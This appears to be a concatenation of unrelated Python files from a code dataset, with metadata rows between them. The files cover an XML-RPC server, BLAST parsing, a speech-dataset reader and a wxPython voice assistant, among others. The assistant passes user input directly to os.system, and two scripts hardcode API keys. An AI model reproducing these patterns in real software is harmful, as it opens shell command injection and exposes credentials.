from xmlrpc.server import *
def pIdeal(altura, sexo):
    """Return the ideal weight for a height `altura` and sex `sexo`.

    Uses the male formula when sexo == "masculino", the female formula
    for any other value.
    """
    is_male = sexo == "masculino"
    slope, offset = (72.7, 58) if is_male else (62.1, 44.7)
    return slope * altura - offset
class RequestHandler(SimpleXMLRPCRequestHandler):
    """Request handler restricting XML-RPC calls to the conventional /RPC2 path."""
    rpc_paths = ('/RPC2',)
# Address the XML-RPC server listens on.
HOST = "localhost"
PORT = 5000
# Expose pIdeal (plus the standard introspection methods) over XML-RPC.
# serve_forever() blocks until the process is interrupted.
with SimpleXMLRPCServer((HOST, PORT), RequestHandler) as server:
    server.register_introspection_functions()
    server.register_function(pIdeal)
    server.serve_forever()
| true |
da8d20d410543589ea155f1f6d91274816341cb7 | Python | Nawaf404/CodingMonth | /Day1/Weather.py | UTF-8 | 354 | 3.203125 | 3 | [] | no_license | import requests
api_address = 'http://api.openweathermap.org./data/2.5/weather?appid=0c42f7f6b53b244c78a418f4f181282a&q='
city = input("Hi, What's your city name :\n")
url = api_address + city
json_data = requests.get(url).json()
main_weather = json_data['weather'][0]['description']
country = json_data['country']
print(country,"\n",main_weather) | true |
6e8643bb2b147cf8a6956cc25d0a604204df3443 | Python | dannytrowbridge/FEADOE | /doe/fitty.py | UTF-8 | 728 | 3.28125 | 3 | [] | no_license | #http://stackoverflow.com/questions/5124126/python-scipy-interpolation-map-coordinates#
import numpy
from scipy import interpolate

# Sample grid: 3 knots along x, 4 along y; z holds the values on the x-by-y grid.
x = numpy.array([0.0, 0.60, 1.0])
y = numpy.array([0.0, 0.25, 0.80, 1.0])
z = numpy.array([
    [1.4, 6.5, 1.5, 1.8],
    [8.9, 7.3, 1.1, 1.09],
    [4.5, 9.2, 1.8, 1.2],
])

# Spline degrees kx/ky must stay below the knot counts, hence 2 for this tiny
# dataset (3 is the usual default).  s=0 forces exact interpolation through the
# samples; s>0 would smooth instead.  A bounding box wider than the data range
# could be supplied to allow extrapolation.
sp = interpolate.RectBivariateSpline(x, y, z, kx=2, ky=2, s=0)

sp([0.60], [0.25])  # evaluates at a knot -> array([[ 7.3]])
sp([0.25], [0.60])  # interpolated point -> array([[ 2.66427408]])
| true |
69fb8a5789d335a69e007c4be45cc51350cfe153 | Python | JordanDekker/ContainR | /app/core/containr/parse_blast_results.py | UTF-8 | 10,819 | 2.765625 | 3 | [
"MIT"
] | permissive | import pandas as pd
from Bio.Blast import NCBIXML
from flask import session
def read_output(ref_dic, blast_xml_file, main_df):
    """Parse BLAST XML output and merge the best-hit taxonomy into main_df.

    Args:
        ref_dic: Dict mapping a hit accession UID to its taxonomy string
            (levels separated by "; ").
        blast_xml_file: Path to the file containing BLAST results in XML
            format.
        main_df: DataFrame based on the TSV input file; expected to carry
            'fw_flagged'/'rv_flagged' columns used when filling unknown
            taxonomy levels.

    Returns:
        main_df: The original DataFrame with per-strand ('fw_'/'rv_')
        BLAST-hit columns added or refreshed.

    Raises:
        FileNotFoundError: When blast_xml_file does not exist.
    """
    try:
        with open(blast_xml_file, 'r') as blast_xml:
            # lijst[0] collects forward-read hits, lijst[1] reverse-read hits,
            # each keyed by the (normalised) FASTQ header.
            lijst = [{}, {}]
            # NCBIXML.parse yields one record object per BLAST query.
            blast_records = NCBIXML.parse(blast_xml)
            for record in blast_records:
                blast_record_alignment = record.alignments
                header = record.query
                if len(blast_record_alignment) != 0:
                    # Only the top alignment's first HSP is kept per query.
                    bit_score = blast_record_alignment[0].hsps[0].bits
                    length = blast_record_alignment[0].hsps[0].align_length
                    identity = int(100 / length * blast_record_alignment[0].hsps[0].identities)
                    accession = blast_record_alignment[0].hit_id
                    # hit_id may look like "gi|12345|..."; take the UID part.
                    if '|' in accession:
                        accession = accession.split('|')[1]
                    taxonomic_name = ref_dic[accession]
                    # Normalise headers to the '@'-prefixed FASTQ form.
                    if header[0] != '@':
                        header = '@'+header
                    # Split the hits into forward (' /1') and reverse sequences.
                    if '/1' in header:
                        lijst[0][header.replace(' /1', '')] = (
                            [accession, taxonomic_name, identity, bit_score, length] + taxonomic_name.split('; '))
                    else:
                        lijst[1][header.replace(' /2', '')] = (
                            [accession, taxonomic_name, identity, bit_score, length] + taxonomic_name.split('; '))
            for i, prefix in enumerate(['fw_', 'rv_']):
                # Drop any previous BLAST columns so re-runs overwrite values
                # even if indices don't match.
                if prefix+'full_tax' in main_df.columns:
                    for column_name in ['accession', 'full_tax','id','bit','coverage_length','Kingdom','Phylum','Class','Order','Family','Genus','Species','Strain']:
                        del main_df[prefix+column_name]
                # Transfer the collected hits (lijst[i]) to a DataFrame keyed by header.
                taxonomic_df = pd.DataFrame.from_dict(lijst[i],
                                                      columns=[prefix + 'accession', prefix + 'full_tax', prefix + 'id',
                                                               prefix + 'bit', prefix + 'coverage_length',
                                                               prefix + 'Kingdom', prefix + 'Phylum', prefix + 'Class', prefix + 'Order',
                                                               prefix + 'Family', prefix + 'Genus', prefix + 'Species', prefix + 'Strain'], orient='index')
                # Combine with the main DataFrame; update first when main_df is empty.
                if len(main_df) == 0:
                    main_df.update(taxonomic_df)
                temp_main_df = pd.merge(main_df,taxonomic_df, left_index=True, right_index=True, how="outer")
                dtypes = main_df.dtypes.combine_first(taxonomic_df.dtypes)
                # Restore the column dtypes the outer merge may have widened.
                # NOTE(review): Series.iteritems() was removed in pandas 2.0;
                # .items() is the modern spelling — confirm the pinned version.
                for key, value in dtypes.iteritems():
                    try:
                        temp_main_df[key] = temp_main_df[key].astype(value)
                    except ValueError:
                        # Numeric columns with unparsable entries are coerced
                        # (bad values become NaN); anything else is a real error.
                        if value in [int,float]:
                            temp_main_df[key] = pd.to_numeric(temp_main_df[key], errors = "coerce")
                        else:
                            raise ValueError
                main_df = temp_main_df
                # Fill the per-level taxonomy columns for rows without a hit,
                # using the strand's 'flagged' column.
                for column in [prefix + 'Kingdom', prefix + 'Phylum', prefix + 'Class', prefix + 'Order',
                               prefix + 'Family', prefix + 'Genus', prefix + 'Species', prefix + 'Strain']:
                    main_df[column] = list(map(fill_unknown_single, main_df[[column, prefix+"flagged"]].values.tolist()))
                del temp_main_df
            for strand in ["fw","rv"]:
                # Fill empty full-taxonomy cells, then derive Species from the
                # last level of a complete 7-level taxonomy string.
                main_df[strand+"_full_tax"] = list(map(fill_unknown, main_df[[strand+"_full_tax",strand+"_flagged"]].values.tolist()))
                main_df[strand+"_Species"] = list(map(lambda x: x[0].split("; ")[-1] if len(str(x[0]).split("; ")) == 7 else x[1], main_df[[strand+"_full_tax",strand+"_Species"]].values.tolist()))
            return main_df
    except FileNotFoundError:
        # NOTE(review): re-raising the class discards the original message
        # and traceback; a bare `raise` would preserve them.
        raise FileNotFoundError
def fill_unknown(info):
    """Normalise a full-taxonomy string, filling empty/unclassified ranks.

    Args:
        info: two-item sequence ``[taxonomy_string, flagged]``.

    Returns:
        The taxonomy joined by '; ' with unclassified ranks replaced by
        'unknown'; the untouched input when flagged; 'unknown' for empty input.
    """
    taxonomy = info[0]
    if info[1]:  # flagged rows are passed through untouched
        return taxonomy
    if taxonomy is None or taxonomy == "" or pd.isnull(taxonomy):
        return "unknown"
    ranks = []
    for rank in taxonomy.split("; "):
        if rank.startswith("u-") or rank.startswith("unclassified"):
            ranks.append("unknown")
        else:
            ranks.append(rank)
    # A complete 7-rank lineage ends in 'G_species'; expand it to 'Genus species'.
    if len(ranks) == 7 and "_" in ranks[6]:
        ranks[6] = ranks[5] + " " + ranks[6].split("_")[1]
    return "; ".join(ranks)
def fill_unknown_single(info):
    """Normalise one taxonomy-rank cell.

    Args:
        info: two-item sequence ``[rank_value, flagged]``.

    Returns:
        The value unchanged when flagged; 'unknown' when the value is empty,
        NaN, or starts with 'u-'/'unclassified'; otherwise the value itself.
    """
    value = info[0]
    if info[1]:  # flagged rows are passed through untouched
        return value
    if value == "" or pd.isna(value) or pd.isnull(value):
        return "unknown"
    if value.startswith(("u-", "unclassified")):
        return "unknown"
    return value
def read_ref(ref_file):
    """Read the reference file and convert it to a dictionary.

    Each line is comma-separated; column 0 is the accession UID and column 2
    the taxonomy (column 1 is ignored via the [0:3:2] slice).

    Args:
        ref_file: path to the file that contains the reference data.

    Returns:
        dict mapping accession UID -> taxonomy string.

    Raises:
        FileNotFoundError: when *ref_file* does not exist. (The original code
        caught it only to re-raise a bare `FileNotFoundError`, which discarded
        the message and offending path; letting it propagate keeps both.)
    """
    ref_dic = {}
    with open(ref_file, 'r') as file:
        for line in file:
            # Indices 0 and 2 of the split: accession UID and taxonomy.
            accession_code, taxonomic_name = line.replace('\n', '').split(',')[0:3:2]
            ref_dic[accession_code] = taxonomic_name
    return ref_dic
def convert_results(main_df):
    """Convert the taxonomy columns into the nested JSON used by the d3 sunburst.

    Counts identical forward/reverse full-taxonomy strings (rows whose visual
    flag is set are excluded) and builds a tree of
    ``{'name': ..., 'children': [...]}`` nodes; leaves carry a 'size' count.

    Args:
        main_df: main DataFrame with 'fw_full_tax'/'rv_full_tax' and the
            corresponding '*_visual_flag' columns.

    Returns:
        root: nested dict rooted at {'name': 'flare', ...} for the sunburst.
    """
    # Only select the full taxonomy of unflagged rows, fw and rv stacked.
    taxonomy_df = pd.concat([main_df[main_df["fw_visual_flag"] == False]['fw_full_tax'], main_df[main_df["rv_visual_flag"] == False]['rv_full_tax']], ignore_index = True)
    # Drop the empty values.
    # TODO: These values are not useless so find a way to use them.
    taxonomy_df = taxonomy_df.dropna()
    # Count repeats and sort by taxonomy string so duplicates are deterministic.
    taxonomy_count = taxonomy_df.value_counts()
    taxonomy_count.sort_index(inplace=True)
    # Create the root.
    root = {'name':'flare', 'children':[]}
    # Loop over the distinct taxonomies.
    for idx, species in enumerate(taxonomy_count):
        # Sequence (the taxonomy string) and its count; reset to the root
        # before descending.
        taxonomy_sequence = taxonomy_count.index[idx]
        size = int(species)
        parts = taxonomy_sequence.split("; ")
        current_node = root
        # Walk the taxonomy ranks, traversing/extending the tree accordingly.
        for i, node_name in enumerate(parts):
            children = current_node["children"]
            # Intermediate rank (not the last element of the chain).
            if i < (len(parts)-1):
                # Guard so the same taxon is not added twice at one level.
                missing_child = True
                # Reuse an existing child node if one matches; break early.
                for child in children:
                    if child['name'] == node_name:
                        child_node = child
                        missing_child = False
                        break
                # Not found: create the intermediate node.
                if missing_child:
                    child_node = {'name':node_name, 'children':[]}
                    children.append(child_node)
                # Descend into the (found or created) node.
                current_node = child_node
            # Last rank: create a leaf carrying the count.
            else:
                child_node = {'name':node_name, 'size':size, 'children':[]}
                children.append(child_node)
    return root
def main_parse_results(ref_file, blast_output, main_df):
    """Read the reference set, parse the BLAST output, and merge into main_df.

    Args:
        ref_file: path of the reference file.
        blast_output: path of the BLAST XML output file.
        main_df: the main DataFrame.

    Returns:
        main_df: the main DataFrame with BLAST columns added, or implicitly
        ``None`` when an error occurred (the error text is written to
        ``data/<session_id>errors.txt`` instead of being raised).
    """
    session_id = session['id']
    try:
        ref_dic = read_ref(ref_file)
        main_df = read_output(ref_dic, blast_output, main_df)
        return main_df
    except FileNotFoundError:
        # One of the input files is missing: record it for the web UI.
        with open('data/' + session_id + "errors.txt", 'w+') as file:
            file.write("one of the files arn't pressent in the input folder")
    except RecursionError:
        # NOTE(review): presumably raised by the XML parser on a malformed
        # reference set — confirm which call actually recurses.
        with open('data/' + session_id + "errors.txt", 'w+') as file:
            file.write("the reference set was invalid")
718ee71012dc7d2ed92d5c6079332738a6c05bcb | Python | gic-utfprmd/asr-study | /datasets/tatoeba.py | UTF-8 | 1,963 | 2.5625 | 3 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | from datasets import DatasetParser
import os
import librosa
import codecs
class Tatoeba(DatasetParser):
    """Tatoeba corpus dataset reader and parser.

    More about the dataset: https://voice.mozilla.org/data
    (NOTE(review): this URL points at Mozilla Common Voice, not Tatoeba —
    looks copy-pasted; confirm the intended link.)
    """

    def __init__(self, dataset_dir=None, name='tatoeba', **kwargs):
        dataset_dir = dataset_dir or 'data/tatoeba'
        super(Tatoeba, self).__init__(dataset_dir, name, **kwargs)

    def _iter(self):
        """Yield one dict (duration/input/label/speaker) per utterance.

        Reads ``sentences_with_audio.csv`` (tab-separated: id, speaker,
        sentence) and resolves each row to an mp3 under ``audio/<speaker>/``.
        Rows whose audio file is missing, or that fail to parse, are logged
        and skipped.
        """
        csv_file = os.path.join(self.dataset_dir, 'sentences_with_audio.csv')
        for line in codecs.open(csv_file, 'r', encoding='utf8'):
            try:
                split = line.strip().split('\t')
                # Ignore the header row of the CSV file.
                if split[0] == 'id':
                    continue
                audio_file = os.path.join(self.dataset_dir, 'audio/' + split[1] + '/' + split[0] + '.mp3')
                label = split[2].lower()
                speaker_id = split[1]
                try:
                    duration = librosa.audio.get_duration(filename=audio_file)
                except IOError:
                    self._logger.error('File %s not found' % audio_file)
                    continue
                yield {'duration': duration,
                       'input': audio_file,
                       'label': label,
                       'speaker': speaker_id}
            except Exception:
                # Was a bare `except:`, which also swallowed KeyboardInterrupt
                # and SystemExit; narrowed so those propagate.
                self._logger.error('Skipping Line: %s' % line)

    def _report(self, dl):
        """Return a short text summary of the parsed dataset."""
        report = '''General information:
           Number of utterances: %d
           Total size (in seconds) of utterances: %.f''' % (len(dl['speaker']), sum(dl['duration']))
        return report
| true |
7a24e54f2a869e07102afff51170f138bf7195b8 | Python | Aasthaengg/IBMdataset | /Python_codes/p03111/s603093422.py | UTF-8 | 1,341 | 2.59375 | 3 | [] | no_license | import math,itertools,fractions,heapq,collections,bisect,sys,queue,copy
sys.setrecursionlimit(10**7)
inf=10**20
mod=10**9+7
dd=[(-1,0),(0,1),(1,0),(0,-1)]
ddn=[(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]
def LI(): return [int(x) for x in sys.stdin.readline().split()]
# def LF(): return [float(x) for x in sys.stdin.readline().split()]
def I(): return int(sys.stdin.readline())
def F(): return float(sys.stdin.readline())
def LS(): return sys.stdin.readline().split()
def S(): return input()
# def main():
# # main()
# print(main())
n,a,b,c=LI()
l=[I() for _ in range(n)]
answer=inf
def f(lst,ind):
global answer
if ind==n:
ac=lst.count(1)
bc=lst.count(2)
cc=lst.count(3)
if ac==0 or bc==0 or cc==0:
return min(answer,inf)
_a=_b=_c=0
for i,x in enumerate(lst):
if x==1:
_a+=l[i]
elif x==2:
_b+=l[i]
elif x==3:
_c+=l[i]
# 合わなかった原因。短縮できることを忘れてた
# if _a>a or _b>b or _c>c:
# return min(answer,inf)
sm=0
sm+=max(0,ac-1)*10
sm+=max(0,bc-1)*10
sm+=max(0,cc-1)*10
sm+=abs(a-_a)
sm+=abs(b-_b)
sm+=abs(c-_c)
return min(answer,sm)
else:
for i in range(4):
lst[ind]=i
answer=min(answer,f(lst,ind+1))
return answer
lst=[-1]*n
print(f(lst,0))
| true |
120f95f180f234d1df7efc8d591d0108f723f7ec | Python | Ch3shireDev/ANN | /old/sandbox3.py | UTF-8 | 1,061 | 2.90625 | 3 | [] | no_license | import numpy as np
from random import randint
# Numerical experiment: minimise f(x) = sum((x - [1..N] + roll(x,1))^2) by
# finite-difference gradient descent with a bracketing line search.
N = 500
n = 8
x = np.array([0 for i in range(N)])
# ex: the N standard basis vectors, used to probe each coordinate.
ex = []
for i in range(N):
    e = [0 for _ in range(N)]
    e[i] = 1
    ex += [e]
def f(x):
    # Works on a single vector (1-D) or on a batch of column vectors (2-D);
    # X is the target ramp 1..N broadcast to the matching shape.
    X = None
    if len(x.shape)>1:
        X = np.outer(np.arange(1, N+1 ), np.ones(n+1))
    else:
        X = np.arange(1,N+1)
    y = x - X + np.roll(x,1,axis=0)
    return sum(y**2)
dx = 0.000001
for i in range(120):
    tab = []  # NOTE(review): unused.
    y0 = f(x)
    # Forward-difference gradient, one basis vector at a time.
    # NOTE(review): np.float was deprecated and removed in NumPy 1.24 —
    # this needs `float` (or np.float64) on current NumPy.
    grad = np.zeros_like(x).astype(np.float)
    for k in range(len(ex)):
        e = ex[k]
        e = np.array(e).astype(np.float)
        y = f(x+e*dx)
        dy = y-y0
        grad += e*dy/dx
    grad /= np.linalg.norm(grad)
    e = grad
    # Line search along the (normalised) gradient: repeatedly evaluate n+1
    # points in [xmin, xmax] and shrink the bracket around the best one.
    # NOTE(review): `dx` is reused here, clobbering the finite-difference step.
    xmin, xmax = -100000, 100000
    x0 = x.copy()
    for j in range(10):
        lin = np.linspace(xmin, xmax, n+1)
        X = x0.T + np.outer(lin, e)
        y = f(X.T)
        index = np.argmin(y)
        x1 = lin[index]
        dx = (xmax-xmin)/n
        xmin, xmax = x1 - dx, x1 + dx
    x = x0 + e*x1
    print(i, y[index])
    if y[index] < 5.1:
        break
| true |
8e37765a46e8ea9c9cab0e0bff10f6a5425055f2 | Python | sbp/funs | /pad.py | UTF-8 | 78 | 2.59375 | 3 | [] | no_license | __all__ = ["pad"]
def pad(text, n, zero="0"):
    """Left-pad *text* with the fill character *zero* to at least *n* chars.

    Text already *n* characters or longer is returned unchanged.
    """
    padded = text.rjust(n, zero)
    return padded
| true |
34fdeb25340ba5aa64353a17a30667347bb5f668 | Python | dyedefRa/python_bastan_sona_sadik_turan | /04_Python_Kosullar/01_if_else_bloglari.py | UTF-8 | 615 | 3.28125 | 3 | [] | no_license | '''
print('Hoş Geldiniz'.center(50,'/'))
if 3>2:
print("Merhaba")
isLoggedin = True
if isLoggedin:
print("Merhaba hoş geldiniz..")
'''
'''
username = 'sadikturan'
password = '1234'
isLoggedin = (username == 'sadikturann') and (password == '1234')
if isLoggedin:
print('Hoş Geldiniz')
else:
print('username ya da parola yanlış')
'''
# Nested-if login demo: check the username first, then the password.
# (User-facing strings are Turkish and intentionally left as-is.)
username = 'sadikturan'
password = '1234'
if (username == 'sadikturan'):
    if (password == '1234'):
        print('Hoş Geldiniz')
    else:
        print("Parola bilginiz yanlış")
else:
    print('username yanlış')
| true |
efae61eca200cb4547c403a4f97c0e8b9a944e47 | Python | nikhilhenry/Spark | /spark.py | UTF-8 | 4,203 | 2.953125 | 3 | [] | no_license | import wx
import wikipedia
import wolframalpha
import os
#Api stuff
app_id = "YPR8W2-2JJ5UWLW8G"#wolframalpha api key
# NOTE(review): the comment says "for wikipedia" but this is the WolframAlpha client.
client = wolframalpha.Client(app_id)#creating client for wikipedia
os.system("espeak Hey_I\'m_Spark")#fisrt statement on bootup
#UI declaration and intialization
# Python 2 wxPython frame: a single text box; on Enter the query is matched
# against canned responses, else dispatched to os.system / WolframAlpha /
# Wikipedia. Replies are printed and spoken via espeak.
class MyFrame(wx.Frame):
    def __init__(self):
        # Fixed-size, non-resizable window with a label and an input field.
        wx.Frame.__init__(self, None,
                          pos=wx.DefaultPosition, size=wx.Size(450, 100),
                          style=wx.MINIMIZE_BOX | wx.SYSTEM_MENU | wx.CAPTION |
                                wx.CLOSE_BOX | wx.CLIP_CHILDREN,
                          title="PyDa")
        panel = wx.Panel(self)
        my_sizer = wx.BoxSizer(wx.VERTICAL)
        lbl = wx.StaticText(panel,
                            label="Hello I am Spark the Python Digital Assistant. How can I help you?")
        my_sizer.Add(lbl, 0, wx.ALL, 5)
        self.txt = wx.TextCtrl(panel, style=wx.TE_PROCESS_ENTER,size=(400,30))
        self.txt.SetFocus()
        # Enter key in the text box triggers OnEnter.
        self.txt.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)
        my_sizer.Add(self.txt, 0, wx.ALL, 5)
        panel.SetSizer(my_sizer)
        self.Show()
    #Getting query
    def OnEnter(self, event):
        # NOTE(review): `input` shadows the builtin of the same name.
        input = self.txt.GetValue()
        input = input.lower()#Changing to a lower case
        #Fun stuff: hard-coded small talk, matched against punctuation variants.
        if input == "who created you" or input == "who created you ?" or input == "who created you?" or input == "who made you" or input == "who made you ?" or input == "who made you?" :
            print "I was created by a genius, 13 year old Nikhil Henry and 14 year old Abhinav Shenoy"
            os.system("espeak I_was_created_by_a_genius,_13_year_old_Nikhil_Henry_and_14_year_old_Abhinav_Shenoy")
        elif input == "who are you" or input == "what are you" or input == "who are you ?" or input == "what are you ?" or input == "what are you?" or input == "who are you?":
            print "I'm Spark the python Digital Assistant"
            os.system("espeak I\'m_Spark_the_python_Digital_Assistant")
        elif input == "where were you made" or input == "where were you made ?" or input == "where were you created" or input == "where were you created ?" or input == "where were you made?" or input == "where were you created?":
            print "I was created in Bangalore,India"
            os.system("espeak I_was_created_in_Bangalore,India")
        elif input == "whats your name" or input == "what's your name ?" or input == "what's your name?" or input == "whats your name?" or input == "whats your name ?":
            print "My name is Python Digital Assistant but you can call me PyDa"
            os.system("espeak My_name_is_Spark!")
        elif input == "howdy":
            print "howdy partner"
            os.system("espeak howdy_partner")
        elif input == "i love you" or input == "i love you Spark" or input == "I love you Spark" or input == "i love you spark":
            print "I am a computer, I have no feelings"
            os.system("espeak I_am_a_computer,_I_have_no_feelings")
        elif input == "how are you" or input == "how are you?":
            print "I am fine, how are you?"
            os.system("espeak I_am_fine,_how_are_you?")
        else:
            try:
                try:
                    # "open <program>" -> run the rest of the query as a shell command.
                    # NOTE(review): queries without "open" raise nothing here, so
                    # the WolframAlpha/Wikipedia fallback below can only run when
                    # this block raises — likely not the intended control flow.
                    # Also, passing user text to os.system is a shell-injection risk.
                    if "open" in input:
                        input = input.split(' ')
                        input = ' '.join(input[1:])
                        os.system(input)
                except:
                    #Fetching data
                    try:#from wolframalpha
                        res = client.query(input)
                        answer = next(res.results).text
                        print answer
                    except:
                        #from wikipedia: drop the first two words and look up the rest.
                        input = input.split(' ')
                        input = ' '.join(input[2:])
                        print wikipedia.summary(input)
                        os.system("espeak I found this article on wikipedia")
            except:
                print "Check your internet connection, error code 404"
#to keep runing: start the wx application and enter its event loop.
if __name__ == "__main__":
    app = wx.App(True)
    frame = MyFrame()
    app.MainLoop()
bcfbb4fc75d0c22c89287f4df050f7ac146f2121 | Python | gptcod/Semantic_Ext_Cybersecurity | /crf_training.py | UTF-8 | 11,782 | 2.5625 | 3 | [] | no_license | import feature_processing
import sklearn_crfsuite
from sklearn_crfsuite import scorers
from sklearn_crfsuite import metrics
from collections import Counter
class CRFTraining:
    """Train and evaluate a linear-chain CRF for token labelling.

    Token tables come from ``feature_processing.FeatureProcessing``; each row
    is either a sentence separator ('\\n') or a "word POS label" string.

    Fixes over the original:
    * Several lines of the form ``features['key']: value`` were annotated
      expression statements — valid syntax that silently does *nothing*.
      They are now real assignments (``=``), so the '-1:postag[:2]',
      '-2:postag[:2]', '+1:postag[:2]' and '+2:postag[:2]' features are
      actually emitted.
    * The two ~70-line near-identical feature extractors for train and test
      are deduplicated into one private helper.
    """

    def __init__(self):
        self.featureP = feature_processing.FeatureProcessing()
        self.featureP.create_test_train_token_tables()
        self.train_table_word_attrs = self.featureP.train_table
        self.test_table_word_attrs = self.featureP.test_table
        self.crf_model = None

    def _word2features(self, table, i):
        """Build the CRF feature dict for token *i* of *table*.

        Context features (previous/next uni- and bigrams) are only added when
        the neighbouring rows exist and are not sentence separators. Note the
        original quirk is preserved: the last token of the table gets no
        "before" context features (guarded by ``i != total_length - 1``).
        """
        total_length = table.shape[0]
        word_attrs = table[i][0].split()
        word = word_attrs[0]
        pos_tag = word_attrs[1]
        # Features of the token itself.
        features = {
            'postag': pos_tag,
            'postag[:2]': pos_tag[:2],
            'word.lower()': word.lower(),
            'word': word,
            'word[-3:]': word[-3:],
            'word[-2:]': word[-2:],
            'word.isupper()': word.isupper(),
            'word.istitle()': word.istitle(),
            'word.isdigit()': word.isdigit()
        }
        if i != total_length - 1:
            if i >= 1:
                if table[i - 1] != '\n':
                    prev_1 = table[i - 1][0].split()
                    word_before = prev_1[0]
                    features['word_unigram_before'] = word_before
                    features['-1:word.lower()'] = word_before.lower()
                    features['-1:word.istitle()'] = word_before.istitle()
                    features['-1:word.isupper()'] = word_before.isupper()
                    features['pos_unigram_before'] = prev_1[1]
                    features['-1:postag[:2]'] = prev_1[1][:2]
            if i >= 2:
                if table[i - 1] != '\n' and table[i - 2] != '\n':
                    prev_1 = table[i - 1][0].split()
                    prev_2 = table[i - 2][0].split()
                    bigram_before = prev_1[0] + " " + prev_2[0]
                    features['word_bigram_before'] = bigram_before
                    features['-2:word.lower()'] = bigram_before.lower()
                    features['-2:word.istitle()'] = bigram_before.istitle()
                    features['-2:word.isupper()'] = bigram_before.isupper()
                    features['pos_bigram_before'] = prev_1[1] + " " + prev_2[1]
                    features['-2:postag[:2]'] = prev_1[1][:2] + " " + prev_2[1][:2]
        if i <= total_length - 2:
            if table[i + 1] != '\n':
                next_1 = table[i + 1][0].split()
                word_after = next_1[0]
                features['word_unigram_after'] = word_after
                features['+1:word.lower()'] = word_after.lower()
                features['+1:word.istitle()'] = word_after.istitle()
                features['+1:word.isupper()'] = word_after.isupper()
                features['pos_unigram_after'] = next_1[1]
                features['+1:postag[:2]'] = next_1[1][:2]
        if i <= total_length - 3:
            if table[i + 1] != '\n' and table[i + 2] != '\n':
                next_1 = table[i + 1][0].split()
                next_2 = table[i + 2][0].split()
                bigram_after = next_1[0] + " " + next_2[0]
                features['word_bigram_after'] = bigram_after
                features['+2:word.lower()'] = bigram_after.lower()
                features['+2:word.istitle()'] = bigram_after.istitle()
                features['+2:word.isupper()'] = bigram_after.isupper()
                features['pos_bigram_after'] = next_1[1] + " " + next_2[1]
                features['+2:postag[:2]'] = next_1[1][:2] + " " + next_2[1][:2]
        return features

    def word2features_train(self, i):
        """Feature dict for token *i* of the training table."""
        return self._word2features(self.train_table_word_attrs, i)

    def word2features_test(self, i):
        """Feature dict for token *i* of the test table."""
        return self._word2features(self.test_table_word_attrs, i)

    def create_x_train(self):
        """Feature dicts for every non-separator training token."""
        x_train = []
        for i in range(self.train_table_word_attrs.shape[0]):
            if self.train_table_word_attrs[i] != '\n':
                x_train.append(self.word2features_train(i))
        return x_train

    def create_y_label_for_train(self):
        """Gold labels (third column) for every non-separator training token."""
        y_label = []
        for i, word_attr in enumerate(self.train_table_word_attrs):
            if word_attr != '\n':
                y_label.append(word_attr[0].split()[2])
        return y_label

    def create_x_test(self):
        """Feature dicts for every non-separator test token."""
        x_test = []
        for i in range(self.test_table_word_attrs.shape[0]):
            if self.test_table_word_attrs[i] != '\n':
                x_test.append(self.word2features_test(i))
        return x_test

    def create_y_label_for_test(self):
        """Gold labels for every non-separator test token."""
        y_label_test = []
        for i, word_attr in enumerate(self.test_table_word_attrs):
            if word_attr != '\n':
                y_label_test.append(word_attr[0].split()[2])
        return y_label_test

    def train_crf(self):
        """Fit an L-BFGS CRF (L1/L2 regularised) on the training tokens."""
        x_train = [self.create_x_train()]
        y_train = [self.create_y_label_for_train()]
        self.crf_model = sklearn_crfsuite.CRF(
            algorithm='lbfgs',
            c1=0.1,
            c2=0.1,
            max_iterations=1000,
            all_possible_transitions=True
        )
        self.crf_model.fit(x_train, y_train)

    def test_crf(self):
        """Predict on the test tokens and print weighted F1 plus a per-label report."""
        x_test = [self.create_x_test()]
        y_test = [self.create_y_label_for_test()]
        labels = list(self.crf_model.classes_)
        y_pred = self.crf_model.predict(x_test)
        print(metrics.flat_f1_score(y_test, y_pred, average='weighted', labels=labels))
        # Sort labels so B-/I- variants of the same entity group together.
        sorted_labels = sorted(
            labels,
            key=lambda name: (name[1:], name[0])
        )
        print(metrics.flat_classification_report(
            y_test, y_pred, labels=sorted_labels, digits=3
        ))
# Script entry: build the token tables, train the CRF, then print test metrics.
crf_obj = CRFTraining()
crf_obj.train_crf()
crf_obj.test_crf()
| true |
8f11d20f43a66d447cf1405066c27fb8cc9ddcf9 | Python | roshandafal98/parsing_xml_data | /evaluation_xml.py | UTF-8 | 455 | 2.90625 | 3 | [] | no_license | import json
from xmltodict import xmltodict
# Convert xml_data.xml to data.json.
# Fix: the original called .close() on files already managed by `with`
# (the context manager closes them); the redundant calls are removed.
# NOTE(review): `from xmltodict import xmltodict` at the top of this file is
# unusual — the upstream package exposes `parse` at module level; confirm a
# vendored layout is intended.

# Parse the XML document into an ordered-dict structure.
with open("xml_data.xml") as xml_file:
    data_dict = xmltodict.parse(xml_file.read())

# Generate the JSON text corresponding to the parsed data.
json_data = json.dumps(data_dict)

# Write the JSON data to the output file.
with open("data.json", "w") as json_file:
    json_file.write(json_data)
| true |
b13486ce139094af0ea7692cf24f9c5eba0d5f21 | Python | opf-labs/AQuA | /aqEudoraMboxAnalysis/TOCAnalysis/eudora_toc_analysis.py | UTF-8 | 1,383 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | import sys
import binascii
#length (bytes) of the Eudora TOC file structure components
header = 72
footer = 32
msg_len = 218
#length (bytes) of the per-message entry components (offsets within an entry)
unknown = 50
timestamp = 32
sender = 64
subject = 64
remainder = 8
total = 218
# TOC file to analyse (first CLI argument) and the summary output next to it.
f = open(sys.argv[1], 'rb')
fsummary = open(sys.argv[1].replace('.toc', '_toc_summary.txt'), 'wb')
#return the number of emails this toc indexes
def getMboxSize(toc):
    """Number of 218-byte entries between the TOC header and footer."""
    toc.seek(0, 2)  # jump to end-of-file to measure the total size
    total_bytes = toc.tell()
    return (total_bytes - header - footer) / 218
#return the name of the mbox this toc indexes
def getMboxName(toc):
    """Mailbox name: the 32 bytes stored at offset 8 of the TOC header."""
    toc.seek(8)
    name_field = toc.read(32)
    return name_field
# Walk every 218-byte entry, decode its fixed-offset fields, and write one
# summary line per message, then a trailer with totals.
# NOTE(review): Python 2 code — under Python 3, read() yields bytes so the
# str-based .replace('\x00', ' ') calls and `range(len)` with a float (true
# division) would fail. Also `len` shadows the builtin.
attachment_count = 0
len = getMboxSize(f)
f.seek(header)
for x in range (len):
    mail = f.read(218)
    # Fixed field offsets inside an entry (NUL padding replaced by spaces).
    field_unknown = mail[0:49].replace('\x00', ' ')
